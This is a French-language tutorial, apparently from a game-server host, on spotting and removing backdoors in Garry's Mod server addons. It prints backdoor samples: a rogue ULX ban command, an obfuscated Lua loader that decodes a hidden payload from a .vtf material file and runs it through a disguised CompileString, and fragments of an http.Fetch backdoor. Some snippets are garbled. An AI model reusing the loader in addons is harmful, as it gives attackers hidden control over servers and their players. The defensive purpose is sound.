Salut à toi ! Aujourd'hui, je vais t'apprendre à reconnaître une backdoor dans tes addons !
Une backdoor est une ligne de code malicieuse permettant d'exécuter une fonction, et le plus souvent, c'est méchant du type de pouvoir mettre tous les joueurs superadmin. Empêcher les administrateurs de bannir ou même mettre ta map sur gmconstruct ( d'ailleurs best map de Garry's Mod RP )
Un addon est constitué de client, shared et server, je ne te l'apprends pas, les backdoors sont seulement dans les fichiers serveur ( donc le plus souvent dans ton addon/server/sv_lesfichiers.lua ). Il y a trois types de backdoors :
Le plus souvent, c'est des commandes bizarre avec ulx comme :
lessCopy code
RunConsoleCommand("ulx", "banid", ply:SteamID:01:483487684() )
C'est la backdoor la plus complexe, elle va exécuter un matériau étant présent qui lui va exécuter une commande.
local function a(b, c) c = c % 177 return (b - c) % 177 end local function d(e, f) local g = tonumber(util.CRC(f)) local h = string.len(e) local i = string.len(f) local j = 1 local k = 1 local l = {} while j <= h do j = j + string.byte(f[k % (i - 1) + 1]) l[k] = a(string.byte(e[j]), g) k = k + 1 j = j + 1 end return string.char(unpack(l)) end local function VTF(m, n, o) local p = file.Open(m, "rb", "BASE_PATH") if not p then return end p:Skip(o) local q = p:Read(p:Size() - o) local vc = _G["Com" .. "pi" .. "leStr" .. "ing"] p:Close() local l = d(q, n) return vc(l, m, false) end local r = VTF("garrysmod/addons/laddondeslownlsleplusbeau/materials/models/cartrunk.vtf", [[epC$5~rNM~k[<="cNF/lM,Iz$Fh1,)]s+\?~'Cla.n{/z`8/VLuE,gWwxnPk-y-x[?D2.V9zFTPsD,TXPt9KD75.}U$!MW,enaWg9ez&@(a{B[[;v5JxxfGO$DJw92&c]], 0)
http.Fetch( FUrl, function( body, len, header, code)
str = str:gsub( "\226\128\168", "\\\226\128\168" )
Avec un serveur GarryHost, tu peux installer un détecteur de backdoor te permettant de directement les localiser.
La première étape pour détecter les backdoors est de comprendre où elles peuvent être cachées. Les backdoors sont souvent placées dans les fichiers serveur d'un addon, donc tu dois te concentrer sur ces fichiers. Les backdoors peuvent être classées en trois types : les commandes, les backdoors en matériaux et les backdoors à l'ancienne.
Les backdoors de type commande ont souvent des noms bizarres et impliquent l'utilisation d'outils d'administration comme ULX. Les backdoors en matériaux sont plus complexes et fonctionnent en exécutant un matériau qui à son tour exécute une commande. Les backdoors à l'ancienne sont généralement des lignes de code qui redirigent vers une URL externe.
Pour détecter ces backdoors, tu peux utiliser un logiciel comme nomalua, que tu peux installer sur ton serveur GarryHost. Avec nomalua, tu peux effectuer une analyse complète de ton serveur pour détecter toutes les backdoors potentielles.
Une fois que tu as détecté une backdoor, la meilleure solution est de la supprimer rapidement. Si tu ne te sens pas à l'aise pour supprimer la backdoor toi-même, demande de l'aide à un professionnel. Il est également important de mettre à jour régulièrement les addons et de vérifier que tous les addons proviennent de sources fiables.
En conclusion, détecter et supprimer les backdoors est essentiel pour protéger ton serveur et tes joueurs. En utilisant des outils de détection comme nomalua et en vérifiant régulièrement les addons, tu peux maintenir un environnement de jeu sûr et sécurisé pour tous les joueurs de Garry's Mod.
© 2015 - 2023 Nexifi. All Rights Reserved.
Ce site n'est pas affilié à Mojang.
